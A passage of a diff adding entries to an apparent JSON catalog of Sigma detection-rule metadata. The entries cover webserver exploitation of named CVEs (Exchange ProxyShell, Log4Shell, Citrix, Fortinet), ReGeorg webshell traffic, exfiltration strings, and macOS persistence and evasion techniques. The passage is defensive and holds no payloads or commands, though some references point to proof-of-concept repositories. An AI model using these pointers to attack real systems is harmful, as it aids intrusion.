"e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error" + }, + { + "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", + "meta": { + "author": "Bhabesh Raj, Florian Roth", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_22123_fortinet_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + 
"logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", + "value": "Fortinet CVE-2021-22123 Exploitation" + }, + { + "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/07", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", + "value": "Exchange ProxyShell Pattern" + }, + { + "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell_successful.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + 
"https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", + "value": "Successful Exchange ProxyShell Attack" + }, + { + "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/04", + "falsepositive": [ + "Web applications that use the same URL parameters as ReGeorg" + ], + "filename": "web_webshell_regeorg.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/sensepost/reGeorg", + "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", + "value": "Webshell ReGeorg Detection Via Web Logs" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://news.ycombinator.com/item?id=29504755", + 
"https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", + "value": "Log4j RCE CVE-2021-44228 Generic" + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "web_apache_segfault.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault" + }, + { + "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_3398_confluence.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", + "value": "Confluence Exploitation CVE-2019-3398" + }, + { + "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "meta": { + "author": "Florian Roth, Max Altgelt, Christian Burkard", + "creation_date": "2021/08/30", + 
"falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", + "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" + }, + { + "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.20090", + "cve.2021.20091" + ] + }, + "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", + "value": "Arcadyan Router Exploitations" + }, + { + "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", 
+ "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.28188" + ] + }, + "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", + "value": "TerraMaster TOS CVE-2020-28188" + }, + { + "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", + "meta": { + "author": "Bhabesh Raj, Tim Shelton", + "creation_date": "2020/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_10148_solarwinds_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://kb.cert.org/vuls/id/843464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", + "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" + }, + { + "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/09/24", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22005_vmware_file_upload.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://kb.vmware.com/s/article/85717", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", + "value": "VMware vCenter Server File Upload CVE-2021-22005" + }, + { + "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "meta": { + "author": "daffainfo, Florian Roth", + "creation_date": "2021/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/ptswarm/status/1445376079548624899", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", + "value": "CVE-2021-41773 Exploitation Attempt" + }, + { + "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "meta": { + "author": "Nasreddine Bencherchali", + 
"creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2014_6287_hfs_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", + "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.t1505.003", + "cve.2014.6287" + ] + }, + "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", + "value": "Rejetto HTTP File Server RCE" + }, + { + "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "meta": { + "author": "frack113", + "creation_date": "2021/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "web_iis_tilt_shortname_scan.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://www.exploit-db.com/exploits/19525", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", + "value": "Successful IIS Shortname Fuzzing Scan" + }, + { + "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious 
actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners" + ], + "filename": "web_cve_2022_31656_auth_bypass.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", + "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" + }, + { + "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", + "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.3452" + ] + }, + "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", + "value": "Cisco ASA FTD Exploit CVE-2020-3452" + }, + { + "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", + "meta": { + "author": "Tobias Michalski, Max Altgelt", + "creation_date": "2021/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": 
"web_cve_2021_40539_adselfservice.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" + ], + "tags": "No established tags" + }, + "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", + "value": "ADSelfService Exploitation" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_msexchange.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", + "value": "CVE-2020-0688 Exchange Exploitation via Web Log" + }, + { + "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Legitimate application and websites that use windows paths in their URL" + ], + "filename": "web_susp_windows_path_uri.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" + ], + "tags": [ + "attack.persistence", + "attack.exfiltration", + 
"attack.t1505.003" + ] + }, + "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", + "value": "Suspicious Windows Strings In URI" + }, + { + "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", + "meta": { + "author": "Arnim Rupp, Florian Roth", + "creation_date": "2020/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_19781_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://isc.sans.edu/diary/25686", + "https://support.citrix.com/article/CTX267027", + "https://support.citrix.com/article/CTX267679", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", + "value": "Citrix Netscaler Attack CVE-2019-19781" + }, + { + "description": "Detects CVE-2020-0688 Exploitation attempts", + "meta": { + "author": "NVISO", + "creation_date": "2020/02/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_exchange_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/Ridter/cve-2020-0688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", + "value": "CVE-2020-0688 Exploitation Attempt" + }, + { + "description": "Detects SSTI attempts sent via GET requests in access logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + 
"falsepositive": [ + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_ssti_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", + "value": "Server Side Template Injection Strings" + }, + { + "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", + "meta": { + "author": "frack113", + "creation_date": "2021/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "web_cve_2021_26858_iis_rce.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + ], + "tags": "No established tags" + }, + "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", + "value": "ProxyLogon Reset Virtual Directories Based On IIS Log" + }, + { + "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", + "meta": { + "author": "Sittikorn S, Nuttakorn Tungpoonsup", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", + "level": "critical", + 
"logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", + "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" + }, + { + "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "file_event_macos_startup_items.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1037.005" + ] + }, + "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", + "value": "Startup Items" + }, + { + "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/23", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "file_event_macos_emond_launch_daemon.yml", + "level": "medium", + 
"logsource.category": "file_event", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.014" + ] + }, + "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", + "value": "MacOS Emond Launch Daemon" + }, + { + "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_security_software_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", + "value": "Security Software Discovery - MacOs" + }, + { + "description": "Detects attempts to use screencapture to collect macOS screenshots", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate user activity taking screenshots" + ], + "filename": "proc_creation_macos_screencapture.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + 
"https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", + "value": "Screen Capture - macOS" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", + "value": "File and Directory Discovery - MacOS" + }, + { + "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Application installers might contain scripts as part of the installation process." 
+ ], + "filename": "proc_creation_macos_applescript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.002" + ] + }, + "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", + "value": "MacOS Scripting Interpreter AppleScript" + }, + { + "description": "Detects macOS Gatekeeper bypass via xattr utility", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.001" + ] + }, + "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", + "value": "Gatekeeper Bypass via Xattr" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", + "value": "MacOS Network Service Scanning" + }, + { + "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", + "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.002", + "attack.initial_access", + "attack.t1059", + "attack.t1059.002", + "attack.t1204", + "attack.t1204.001", + "attack.execution", + "attack.persistence", + "attack.t1553", + "attack.defense_evasion" + ] + }, + "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", + "value": "Suspicious Execution via macOS Script Editor" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 
This rule detect using dd and truncate to add a junk data to file.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "proc_creation_macos_binary_padding.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", + "value": "Binary Padding - MacOS" + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_create_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": 